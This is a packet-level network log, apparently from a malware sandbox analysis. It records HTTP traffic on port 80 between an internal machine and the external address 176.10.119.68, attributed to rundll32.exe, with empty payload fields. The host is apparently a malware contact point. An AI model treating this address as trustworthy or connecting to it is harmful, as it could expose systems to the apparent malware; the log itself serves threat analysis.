May 26, 2022 04:06:52.836867094 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836894989 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836906910 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836919069 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836951017 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836992979 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.850702047 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850744963 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850764990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850784063 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850800037 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850812912 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850830078 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850842953 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850897074 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.850929976 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852664948 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852705956 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852727890 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852750063 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852771044 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852787018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852798939 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852819920 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852833033 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852843046 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852861881 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852874041 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852893114 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852902889 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852926970 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852940083 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852961063 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852971077 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852993011 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.853002071 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.853017092 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.853024960 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.853045940 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.853059053 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.853095055 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865576029 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865628004 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865655899 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865683079 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865709066 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865736008 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865752935 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865772963 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865792036 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865812063 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865853071 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865901947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865946054 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865961075 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865988970 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865998983 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866029024 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866055012 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866081953 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866092920 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866116047 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866131067 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866151094 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866168022 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866180897 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866226912 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866290092 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866317034 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866328955 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866350889 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866367102 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866388083 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866405964 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866425991 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.879981041 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880027056 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880048990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880072117 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880095005 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880117893 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880134106 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880161047 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880187988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880209923 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880247116 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880270004 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880280018 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880300045 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880315065 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880337954 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880362988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880377054 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880393028 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880410910 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880491018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880517960 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880563021 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880588055 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880609035 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880635023 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880640984 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880666018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880672932 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880691051 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880697012 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880721092 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880738974 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.884610891 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.892374039 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892416000 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892438889 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892461061 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892491102 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.892505884 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.892543077 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892566919 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892585993 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892606974 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.892664909 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892705917 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893610001 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893644094 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893671989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893681049 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893690109 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893712044 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893721104 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893743038 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893752098 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893774986 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893780947 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893795967 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893811941 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893831015 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894366980 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894408941 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894433022 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894454002 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894471884 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894490004 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894506931 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894524097 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894541025 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894547939 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894565105 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894576073 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894594908 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894603014 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894627094 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894690990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894731998 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894741058 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894757032 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894768000 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894788027 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908045053 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908078909 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908101082 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908149958 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908165932 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908193111 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908202887 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908226013 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908236027 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908252954 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908274889 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908296108 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908459902 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908502102 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908524990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908544064 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908555031 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908596992 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908607006 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908626080 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908639908 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908670902 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908685923 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908791065 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908808947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908849001 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908868074 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908880949 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908905983 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908935070 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.909110069 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.909157991 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.909176111 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.909187078 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.909210920 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.909239054 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.920998096 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921032906 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921047926 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921060085 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921191931 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.921210051 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.921463013 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921484947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921499968 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921511889 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921552896 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.921600103 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.922487020 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.922509909 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.922525883 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.922537088 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.922591925 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.922624111 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923270941 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923290014 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923305988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923321009 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923336983 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923357010 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923367977 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923382998 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923391104 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923425913 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923712969 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923732042 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923748016 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923758984 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923772097 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923825979 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.924022913 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.924041033 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.924057007 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.924074888 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.924081087 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.924123049 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.935115099 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.935152054 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.935168982 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.935182095 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.935283899 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.935326099 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937022924 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937042952 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937058926 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937074900 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937091112 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937105894 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937119007 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937144041 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937202930 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937446117 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937463999 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937493086 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937503099 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937520981 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937536955 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937546968 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937566042 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937582970 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937608004 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937628984 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938286066 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938302994 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938318014 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938328981 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938360929 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.938410044 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.938601017 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938616991 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938632965 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938643932 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938671112 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.938698053 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.949590921 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949631929 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949651003 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949672937 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949688911 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949723959 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.949791908 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:53.058631897 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:53.071225882 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:53.344055891 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:53.344110012 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:53.344240904 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:07:47.020793915 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49752 | 176.10.119.68 | 80 | C:\Windows\SysWOW64\rundll32.exe |

Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 26, 2022 04:06:52.073632002 CEST | 1254 | OUT | |
May 26, 2022 04:06:52.343399048 CEST | 1256 | IN | |